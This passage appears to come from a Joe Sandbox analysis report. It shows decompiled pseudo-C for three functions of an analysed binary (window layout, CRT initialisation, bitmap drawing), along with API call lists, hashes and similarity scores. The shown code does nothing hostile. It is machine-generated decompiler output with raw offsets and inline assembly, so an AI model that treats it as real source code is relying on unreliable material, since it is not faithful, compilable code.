                  C-Code - Quality: 81%
                  			E0041BD5E(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				struct tagRECT _v64;
				struct tagRECT _v80;
				struct tagRECT _v96;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t181;
				intOrPtr _t185;
				signed int _t187;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t211;
				void* _t215;
				intOrPtr _t223;
				intOrPtr _t224;
				signed int _t230;
				signed int _t240;
				signed int _t245;
				long _t252;
				intOrPtr _t253;
				signed int _t259;
				signed int _t268;
				signed int _t275;
				intOrPtr* _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				intOrPtr _t295;
				signed int* _t306;
				intOrPtr _t313;
				signed int _t321;
				intOrPtr _t323;
				signed int _t327;
				intOrPtr* _t339;
				intOrPtr* _t340;
				signed int _t348;
				signed int _t349;
				intOrPtr* _t350;
				signed int _t353;

				_t291 = __ecx;
				_t285 = __ecx;
				_v8 = __ecx;
				if(__ecx != 0) {
					L2:
					E004230B9(_a4, _a8, _a12);
					if(IsRectEmpty(_t285 + 0xb4) != 0) {
						_t291 = _t285;
						_t181 = E0040ED1C(_t285);
						if(_t181 == 0) {
							goto L1;
						} else {
							GetClientRect( *(_t181 + 0x20),  &_v80);
							_t185 = _v80.right - _v80.left;
							_t295 = _v80.bottom - _v80.top;
							goto L6;
						}
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)( *_t285 + 0x148))( &_v64, _a12);
						_t185 = _v64.right - _v64.left;
						_t295 = _v64.bottom - _v64.top;
						L6:
						_v28 = _t295;
						_v32 = _t185;
						if( *((intOrPtr*)(_t285 + 0xb0)) == 0) {
							_v128 = BeginDeferWindowPos( *(_t285 + 0xa4));
						} else {
							_v128 = _v128 & 0x00000000;
						}
						_t286 =  *0x44fc20; // 0x2
						_t348 =  *0x44fc24; // 0x2
						_t339 = _v8;
						_t187 = 0;
						_t349 =  ~_t348;
						_t287 =  ~_t286;
						_v44 = _t349;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						if( *((intOrPtr*)(_t339 + 0xa4)) <= 0) {
							L76:
							_t350 = _a4;
							if( *((intOrPtr*)(_t339 + 0xb0)) == _t187 && _v128 != _t187) {
								EndDeferWindowPos(_v128);
							}
							SetRectEmpty( &_v96);
							 *((intOrPtr*)( *_t339 + 0x148))( &_v96, _a12);
							if(_a8 == 0 || _a12 == 0) {
								_t192 =  *_t350;
								if(_t192 != 0) {
									 *_t350 = _v96.left - _v96.right + _t192;
								}
							}
							if(_a8 == 0 || _a12 != 0) {
								_t193 =  *((intOrPtr*)(_t350 + 4));
								if(_t193 != 0) {
									 *((intOrPtr*)(_t350 + 4)) = _v96.top - _v96.bottom + _t193;
								}
							}
							return _t350;
						} else {
							do {
								_t340 = E0041B834(_v8, _v12);
								_v24 = _t340;
								_t198 =  *((intOrPtr*)(E00415D21(_t287, _v8 + 0x9c, _t340, _v12)));
								if(_t340 == 0) {
									if(_t198 != 0) {
										goto L74;
									}
									L61:
									if(_v16 != 0) {
										_t200 = _v16;
										_t306 = _a4;
										if(_a12 == 0) {
											_t287 = _t287 + _t200 -  *0x44fc20;
											_t202 =  *_t306;
											if(_t202 <= _t287) {
												_t202 = _t287;
											}
											 *_t306 = _t202;
											_t203 = _t306[1];
											if(_t203 <= _t349) {
												_t203 = _t349;
											}
											_t306[1] = _t203;
											_t353 =  *0x44fc24; // 0x2
											_t349 =  ~_t353;
											_v44 = _t349;
										} else {
											_t349 = _t349 + _t200 -  *0x44fc24;
											_t205 =  *_t306;
											_v44 = _t349;
											if(_t205 > _t287) {
												_t287 = _t205;
											}
											_t206 = _t306[1];
											 *_t306 = _t287;
											if(_t206 <= _t349) {
												_t206 = _t349;
											}
											_t306[1] = _t206;
											_t288 =  *0x44fc20; // 0x2
											_t287 =  ~_t288;
										}
										_v16 = _v16 & 0x00000000;
									}
									goto L74;
								}
								if( *((intOrPtr*)( *_t340 + 0x168))() == 0) {
									L58:
									if(_v20 != 0) {
										goto L74;
									}
									L59:
									 *((intOrPtr*)( *_t340 + 0x16c))( &_v128);
									goto L74;
								}
								_t211 =  *(_t340 + 0x84);
								if((_t211 & 0x00000004) == 0 || (_t211 & 0x00000001) == 0) {
									asm("sbb eax, eax");
									_t215 = ( ~(_t211 & 0x0000a000) & 0xfffffffa) + 0x10;
								} else {
									_t215 = 6;
								}
								 *((intOrPtr*)( *_t340 + 0x140))( &_v40, 0xffffffff, _t215);
								E0041B557( &_v64, _t287, _t349, _v40, _v36);
								GetWindowRect( *(_t340 + 0x20),  &_v80);
								E004144FC(_v8,  &_v80);
								if(_a12 == 0) {
									_t223 = _v80.top;
									if(_t223 > _v64.top &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										OffsetRect( &_v64, 0, _t223 - _v64.top);
									}
									_t224 = _v64.bottom;
									_t313 = _v28;
									if(_t224 > _t313 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										_t321 = _t313 - _t224 - _v64.top -  *0x44fc24;
										_t245 = _t321;
										if(_t321 <= _t349) {
											_t245 = _t349;
										}
										OffsetRect( &_v64, 0, _t245 - _v64.top);
									}
									if(_v20 == 0) {
										if(_v64.top < _v28 -  *0x44fc24 || _v12 <= 0 ||  *((intOrPtr*)(E00415D21(_t287, _v8 + 0x9c, _t340, _v12 - 1))) == 0) {
											goto L51;
										} else {
											goto L37;
										}
									} else {
										_t240 =  *0x44fc24; // 0x2
										_v20 = _v20 & 0x00000000;
										OffsetRect( &_v64, 0,  ~(_v64.top + _t240));
										L51:
										if(EqualRect( &_v64,  &_v80) == 0) {
											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t340 + 0x84) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t340 = _v24;
											}
											E0040C357( &_v128,  *(_t340 + 0x20),  &_v64);
										}
										_t230 = _v40;
										_t349 = _v64.top -  *0x44fc24 + _v36;
										_v44 = _t349;
										if(_v16 > _t230) {
											goto L59;
										} else {
											_v16 = _t230;
											goto L58;
										}
									}
								} else {
									_t252 = _v80.left;
									if(_t252 > _v64.left &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										OffsetRect( &_v64, _t252 - _v64.left, 0);
									}
									_t253 = _v64.right;
									_t323 = _v32;
									if(_t253 > _t323 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										_t327 = _t323 - _t253 -  *0x44fc20 - _v64.left;
										_t275 = _t327;
										if(_t327 <= _t287) {
											_t275 = _t287;
										}
										OffsetRect( &_v64, _t275 - _v64.left, 0);
									}
									if(_v20 == 0) {
										if(_v64.left < _v32 -  *0x44fc20 || _v12 <= 0 ||  *((intOrPtr*)(E00415D21(_t287, _v8 + 0x9c, _t340, _v12 - 1))) == 0) {
											goto L27;
										} else {
											L37:
											_push(1);
											_push(0);
											E0042598D(_t287, _v8 + 0x9c, 1, _v12);
											_v20 = 1;
											goto L61;
										}
									} else {
										_t268 =  *0x44fc20; // 0x2
										_v20 = _v20 & 0x00000000;
										OffsetRect( &_v64,  ~(_t268 + _v64.left), 0);
										L27:
										if(EqualRect( &_v64,  &_v80) == 0) {
											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t340 + 0x84) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t349 = _v44;
												_t340 = _v24;
											}
											E0040C357( &_v128,  *(_t340 + 0x20),  &_v64);
										}
										_t259 = _v36;
										_t287 = _v40 -  *0x44fc20 + _v64.left;
										if(_v16 <= _t259) {
											_v16 = _t259;
										}
										goto L59;
									}
								}
								L74:
								_v12 = _v12 + 1;
								_t199 = _v8;
							} while (_v12 <  *((intOrPtr*)(_t199 + 0xa4)));
							_t339 = _t199;
							_t187 = 0;
							goto L76;
						}
					}
				}
				L1:
				E00413DD0(_t291);
				goto L2;
			}




























































                  0x0041bd5e
                  0x0041bd67
                  0x0041bd6b
                  0x0041bd70
                  0x0041bd77
                  0x0041bd80
                  0x0041bd94
                  0x0041bdbc
                  0x0041bdbe
                  0x0041bdc5
                  0x00000000
                  0x0041bdc7
                  0x0041bdce
                  0x0041bdda
                  0x0041bddd
                  0x00000000
                  0x0041bddd
                  0x0041bd96
                  0x0041bd9e
                  0x0041bd9f
                  0x0041bda0
                  0x0041bda7
                  0x0041bda8
                  0x0041bdb4
                  0x0041bdb7
                  0x0041bde0
                  0x0041bde7
                  0x0041bdea
                  0x0041bded
                  0x0041be01
                  0x0041bdef
                  0x0041bdef
                  0x0041bdef
                  0x0041be04
                  0x0041be0a
                  0x0041be10
                  0x0041be13
                  0x0041be15
                  0x0041be17
                  0x0041be1f
                  0x0041be22
                  0x0041be25
                  0x0041be28
                  0x0041be2b
                  0x0041c1d5
                  0x0041c1d5
                  0x0041c1de
                  0x0041c1e8
                  0x0041c1e8
                  0x0041c1f2
                  0x0041c203
                  0x0041c20e
                  0x0041c215
                  0x0041c219
                  0x0041c223
                  0x0041c223
                  0x0041c219
                  0x0041c228
                  0x0041c22f
                  0x0041c234
                  0x0041c23e
                  0x0041c23e
                  0x0041c234
                  0x0041c247
                  0x0041be31
                  0x0041be31
                  0x0041be42
                  0x0041be4a
                  0x0041be52
                  0x0041be56
                  0x0041c150
                  0x00000000
                  0x00000000
                  0x0041c152
                  0x0041c156
                  0x0041c15c
                  0x0041c15f
                  0x0041c162
                  0x0041c195
                  0x0041c197
                  0x0041c19b
                  0x0041c19d
                  0x0041c19d
                  0x0041c19f
                  0x0041c1a1
                  0x0041c1a6
                  0x0041c1a8
                  0x0041c1a8
                  0x0041c1aa
                  0x0041c1ad
                  0x0041c1b3
                  0x0041c1b5
                  0x0041c164
                  0x0041c16a
                  0x0041c16c
                  0x0041c170
                  0x0041c173
                  0x0041c175
                  0x0041c175
                  0x0041c177
                  0x0041c17c
                  0x0041c17e
                  0x0041c180
                  0x0041c180
                  0x0041c182
                  0x0041c185
                  0x0041c18b
                  0x0041c18b
                  0x0041c1b8
                  0x0041c1b8
                  0x00000000
                  0x0041c156
                  0x0041be68
                  0x0041c138
                  0x0041c13c
                  0x00000000
                  0x00000000
                  0x0041c13e
                  0x0041c146
                  0x00000000
                  0x0041c146
                  0x0041be6e
                  0x0041be76
                  0x0041be88
                  0x0041be8d
                  0x0041be7c
                  0x0041be7e
                  0x0041be7e
                  0x0041be9b
                  0x0041beac
                  0x0041beb8
                  0x0041bec5
                  0x0041bece
                  0x0041c01d
                  0x0041c023
                  0x0041c03b
                  0x0041c03b
                  0x0041c041
                  0x0041c044
                  0x0041c049
                  0x0041c060
                  0x0041c064
                  0x0041c066
                  0x0041c068
                  0x0041c068
                  0x0041c074
                  0x0041c074
                  0x0041c07e
                  0x0041c0ab
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041c080
                  0x0041c080
                  0x0041c088
                  0x0041c097
                  0x0041c0cf
                  0x0041c0df
                  0x0041c0eb
                  0x0041c108
                  0x0041c109
                  0x0041c10a
                  0x0041c10b
                  0x0041c10c
                  0x0041c10c
                  0x0041c119
                  0x0041c119
                  0x0041c127
                  0x0041c12a
                  0x0041c130
                  0x0041c133
                  0x00000000
                  0x0041c135
                  0x0041c135
                  0x00000000
                  0x0041c135
                  0x0041c133
                  0x0041bed4
                  0x0041bed4
                  0x0041beda
                  0x0041bef2
                  0x0041bef2
                  0x0041bef8
                  0x0041befb
                  0x0041bf00
                  0x0041bf17
                  0x0041bf1b
                  0x0041bf1d
                  0x0041bf1f
                  0x0041bf1f
                  0x0041bf2b
                  0x0041bf2b
                  0x0041bf35
                  0x0041bfd6
                  0x00000000
                  0x0041bffe
                  0x0041bffe
                  0x0041c004
                  0x0041c005
                  0x0041c010
                  0x0041c015
                  0x00000000
                  0x0041c015
                  0x0041bf3b
                  0x0041bf3b
                  0x0041bf43
                  0x0041bf52
                  0x0041bf58
                  0x0041bf68
                  0x0041bf74
                  0x0041bf91
                  0x0041bf92
                  0x0041bf93
                  0x0041bf94
                  0x0041bf95
                  0x0041bf98
                  0x0041bf98
                  0x0041bfa5
                  0x0041bfa5
                  0x0041bfb3
                  0x0041bfb6
                  0x0041bfbc
                  0x0041bfc2
                  0x0041bfc2
                  0x00000000
                  0x0041bfbc
                  0x0041bf35
                  0x0041c1bc
                  0x0041c1bc
                  0x0041c1bf
                  0x0041c1c5
                  0x0041c1d1
                  0x0041c1d3
                  0x00000000
                  0x0041c1d3
                  0x0041be2b
                  0x0041bd94
                  0x0041bd72
                  0x0041bd72
                  0x00000000

                  APIs
                  • IsRectEmpty.USER32(?), ref: 0041BD8C
                  • GetWindowRect.USER32(?,?), ref: 0041BEB8
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • GetClientRect.USER32(?,?), ref: 0041BDCE
                  • BeginDeferWindowPos.USER32(?), ref: 0041BDFB
                  • OffsetRect.USER32(?,?,00000000), ref: 0041BEF2
                  • OffsetRect.USER32(?,?,00000000), ref: 0041BF2B
                  • OffsetRect.USER32(?,00000002,00000000), ref: 0041BF52
                  • EqualRect.USER32(?,?), ref: 0041BF60
                  • OffsetRect.USER32(?,00000000,?), ref: 0041C03B
                  • OffsetRect.USER32(?,00000000,?), ref: 0041C074
                  • OffsetRect.USER32(?,00000000,?), ref: 0041C097
                  • EqualRect.USER32(?,?), ref: 0041C0D7
                  • EndDeferWindowPos.USER32(?), ref: 0041C1E8
                  • SetRectEmpty.USER32(?), ref: 0041C1F2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClientException@8Throw
                  • String ID:
                  • API String ID: 3702718982-0
                  • Opcode ID: 06d616b03f9a624bc04a077d25beb9566651836fc35b65059f93bdd74f78881a
                  • Instruction ID: 207ede8d000545892e6abfd909b87ba6373fdea8484525c380ca6fcb58f066ae
                  • Opcode Fuzzy Hash: 06d616b03f9a624bc04a077d25beb9566651836fc35b65059f93bdd74f78881a
                  • Instruction Fuzzy Hash: FA020531A40209EFCB14DFA8D988BEEBBB5FF08304F14416AE515E7251DB78A985CF58
                  Uniqueness

                  Uniqueness Score: 2.04%

                  Function 0042C1FA, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderUNIQUELIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0042C1FA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x447c18);
				E00429338(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0042AE75(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x442038;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x44c790;
				E0042EACE(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0042C2CF();
				E0042EACE(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x44cd98; // 0x44ccc0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0042FE28( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0042937D(E0042C2D8());
			}








                  0x0042c1fa
                  0x0042c1fa
                  0x0042c1fc
                  0x0042c201
                  0x0042c206
                  0x0042c20c
                  0x0042c214
                  0x0042c217
                  0x0042c21c
                  0x0042c21d
                  0x0042c220
                  0x0042c223
                  0x0042c22d
                  0x0042c232
                  0x0042c23a
                  0x0042c242
                  0x0042c252
                  0x0042c252
                  0x0042c258
                  0x0042c25b
                  0x0042c262
                  0x0042c269
                  0x0042c272
                  0x0042c278
                  0x0042c27f
                  0x0042c285
                  0x0042c28c
                  0x0042c293
                  0x0042c299
                  0x0042c29c
                  0x0042c29f
                  0x0042c2a4
                  0x0042c2a6
                  0x0042c2ab
                  0x0042c2ab
                  0x0042c2b1
                  0x0042c2b7
                  0x0042c2c8

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00447C18,0000000C,0042C335,00000000,00000000,?,8007000E,0042942E,0042838C,00000000,?,0040B742,8007000E,00000000), ref: 0042C20C
                  • __crt_waiting_on_module_handle.LIBCMT ref: 0042C217
                    • Part of subcall function 0042AE75: Sleep.KERNEL32(000003E8,?,?,0042C15D,KERNEL32.DLL,?,0042F5E4,?,00428386,8007000E,00000000,?,0040B742,8007000E,00000000), ref: 0042AE81
                    • Part of subcall function 0042AE75: GetModuleHandleW.KERNEL32(8007000E,?,?,0042C15D,KERNEL32.DLL,?,0042F5E4,?,00428386,8007000E,00000000,?,0040B742,8007000E,00000000), ref: 0042AE8A
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042C240
                  • GetProcAddress.KERNEL32(0000000C,DecodePointer), ref: 0042C250
                  • __lock.LIBCMT ref: 0042C272
                  • InterlockedIncrement.KERNEL32(?), ref: 0042C27F
                  • __lock.LIBCMT ref: 0042C293
                  • ___addlocaleref.LIBCMT ref: 0042C2B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: 8 D$DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-1250515483
                  • Opcode ID: f85e20c151638ceda569236393f2367ce36111e30d9eb07b707b6575cf9c2241
                  • Instruction ID: 272156a274169cf98e5df12e0585ebb411e39ba6d11b4d69191f20877a793770
                  • Opcode Fuzzy Hash: f85e20c151638ceda569236393f2367ce36111e30d9eb07b707b6575cf9c2241
                  • Instruction Fuzzy Hash: 6A110570A44701EEE720DF66A841B4EBBE0AF40314F90446FF499932A1CBB89900CF6C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00414ED8, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 224windowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00414ED8(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t144;
				intOrPtr _t191;
				void* _t196;

				_t194 = __esi;
				_push(0x70);
				E0042922B(E00438E01, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t196 - 0x44)) = 0x43e78c;
				 *(_t196 - 0x40) = 0;
				 *((intOrPtr*)(_t196 - 0x3c)) = 0;
				 *((intOrPtr*)(_t196 - 0x38)) = 0;
				 *(_t196 - 4) = 0;
				 *((intOrPtr*)(_t196 - 0x54)) = 0x43e78c;
				 *(_t196 - 0x50) = 0;
				 *((intOrPtr*)(_t196 - 0x4c)) = 0;
				 *((intOrPtr*)(_t196 - 0x48)) = 0;
				 *((intOrPtr*)(_t196 - 0x34)) = 0x43e78c;
				 *(_t196 - 0x30) = 0;
				 *((intOrPtr*)(_t196 - 0x2c)) = 0;
				 *((intOrPtr*)(_t196 - 0x28)) = 0;
				 *((intOrPtr*)(_t196 - 0x18)) = 0;
				 *((intOrPtr*)(_t196 - 0x1c)) = 0x43ea08;
				_t191 = 0x43e9f8;
				 *((intOrPtr*)(_t196 - 0x20)) = 0;
				 *((intOrPtr*)(_t196 - 0x24)) = 0x43e9f8;
				 *(_t196 - 4) = 4;
				if(E004149F6(_t196 - 0x44, 0) != 0 && E004149F6(_t196 - 0x54, 0) != 0 && E004149F6(_t196 - 0x34, 0) != 0 && GetObjectW( *( *((intOrPtr*)(_t196 + 8)) + 4), 0x18, _t196 - 0x7c) != 0) {
					E00414990( *((intOrPtr*)(_t196 + 0xc)));
					if(E004149CC( *((intOrPtr*)(_t196 + 0xc)),  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x6c) & 0x0000ffff,  *(_t196 - 0x6a) & 0x0000ffff, 0) != 0) {
						_t194 = 1;
						E00414938(0, _t196 - 0x1c, 0x43e9f8, CreateBitmap(8, 8, 1, 1, 0x43ea14));
						E004149A6(_t196 - 0x24, _t196 - 0x1c);
						E00414990(_t196 - 0x1c);
						E004149CC(_t196 - 0x1c,  *(_t196 - 0x78),  *(_t196 - 0x74), 1, 1, 0);
						 *((intOrPtr*)(_t196 + 8)) = E00414B47(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
						_t137 = E00414B47(_t196 - 0x54, _t196 - 0x1c);
						 *((intOrPtr*)(_t196 - 0x14)) = _t137;
						if( *((intOrPtr*)(_t196 + 8)) != 0 && _t137 != 0) {
							_t139 = E00413F1D(GetPixel( *(_t196 - 0x40), 0, 0), _t196 - 0x44, _t138);
							_t194 = BitBlt;
							 *((intOrPtr*)(_t196 - 0x10)) = _t139;
							E00413F1D(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xcc0020), _t196 - 0x44, 0xffffff);
							E00413F1D(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xee0086), _t196 - 0x44,  *((intOrPtr*)(_t196 - 0x10)));
							_t144 = E00414B47(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
							 *((intOrPtr*)(_t196 + 0xc)) = _t144;
							_t205 = _t144;
							if(_t144 != 0) {
								 *((intOrPtr*)(_t196 + 0x14)) = E00413F1D(E00413F82(_t144, _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x10))), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
								 *(_t196 - 0x5c) =  *(_t196 - 0x78);
								 *(_t196 - 0x58) =  *(_t196 - 0x74);
								 *((intOrPtr*)(_t196 - 0x64)) = 0;
								 *((intOrPtr*)(_t196 - 0x60)) = 0;
								E00413F1D(E00413F82(E00414186(_t196 - 0x34, _t196 - 0x64, _t196 - 0x24), _t196 - 0x34, _t148), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x50), 0, 0, 0x8800c6);
								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
								_t191 = 0x43e9f8;
							}
							E00414B47(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
							E00414B47(_t196 - 0x54,  *((intOrPtr*)(_t196 - 0x14)));
							E00414B47(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
						}
					}
				}
				 *(_t196 - 4) = 3;
				 *((intOrPtr*)(_t196 - 0x24)) = _t191;
				E00414B63(0, _t196 - 0x24, _t191, _t194, _t205);
				 *(_t196 - 4) = 2;
				 *((intOrPtr*)(_t196 - 0x1c)) = 0x43ea08;
				E00414B63(0, _t196 - 0x1c, _t191, _t194, _t205);
				 *(_t196 - 4) = 1;
				E004146E5(_t196 - 0x34);
				 *(_t196 - 4) = 0;
				E004146E5(_t196 - 0x54);
				 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
				return E00429303(E004146E5(_t196 - 0x44));
			}








                  0x00414ed8
                  0x00414ed8
                  0x00414edf
                  0x00414eeb
                  0x00414eee
                  0x00414ef1
                  0x00414ef4
                  0x00414ef7
                  0x00414efa
                  0x00414efd
                  0x00414f00
                  0x00414f03
                  0x00414f06
                  0x00414f09
                  0x00414f0c
                  0x00414f0f
                  0x00414f12
                  0x00414f15
                  0x00414f1c
                  0x00414f21
                  0x00414f24
                  0x00414f2b
                  0x00414f36
                  0x00414f7b
                  0x00414f9b
                  0x00414fa8
                  0x00414fb9
                  0x00414fc5
                  0x00414fcd
                  0x00414fde
                  0x00414fee
                  0x00414ff8
                  0x00414ffd
                  0x00415003
                  0x00415020
                  0x00415025
                  0x00415035
                  0x0041504d
                  0x0041506f
                  0x0041507a
                  0x0041507f
                  0x00415082
                  0x00415084
                  0x004150a2
                  0x004150a8
                  0x004150ae
                  0x004150bc
                  0x004150bf
                  0x004150d6
                  0x004150f1
                  0x00415108
                  0x0041511b
                  0x0041511d
                  0x0041511d
                  0x00415128
                  0x00415133
                  0x0041513e
                  0x0041513e
                  0x00415003
                  0x00414f9b
                  0x00415146
                  0x0041514a
                  0x0041514d
                  0x00415155
                  0x00415159
                  0x00415160
                  0x00415168
                  0x0041516c
                  0x00415174
                  0x00415177
                  0x0041517c
                  0x0041518d

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414EDF
                    • Part of subcall function 004149F6: CreateCompatibleDC.GDI32(?), ref: 00414A09
                  • GetObjectW.GDI32(00000004,00000018,?), ref: 00414F6A
                    • Part of subcall function 004149CC: CreateBitmap.GDI32(?,?,?,?,?), ref: 004149E3
                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0043EA14), ref: 00414FAF
                    • Part of subcall function 004149A6: CreatePatternBrush.GDI32(?), ref: 004149B9
                    • Part of subcall function 00414990: DeleteObject.GDI32(00000000), ref: 0041499F
                  • GetPixel.GDI32(?,00000000,00000000), ref: 00415016
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F3B
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F48
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00415043
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 00415067
                    • Part of subcall function 00413F82: SetTextColor.GDI32(?,?), ref: 00413FA0
                    • Part of subcall function 00413F82: SetTextColor.GDI32(?,?), ref: 00413FAD
                    • Part of subcall function 00414186: FillRect.USER32(?,004110CD,?), ref: 0041419C
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 004150F1
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 00415108
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041511B
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ColorCreate$BitmapObjectText$BrushCompatibleDeleteFillH_prolog3PatternPixelRect
                  • String ID: 6AA$BAA
                  • API String ID: 3432338323-1136626083
                  • Opcode ID: 49575fe09fa3281def47276dcee75f14851e47962da65c3dd0b0baef01b08a45
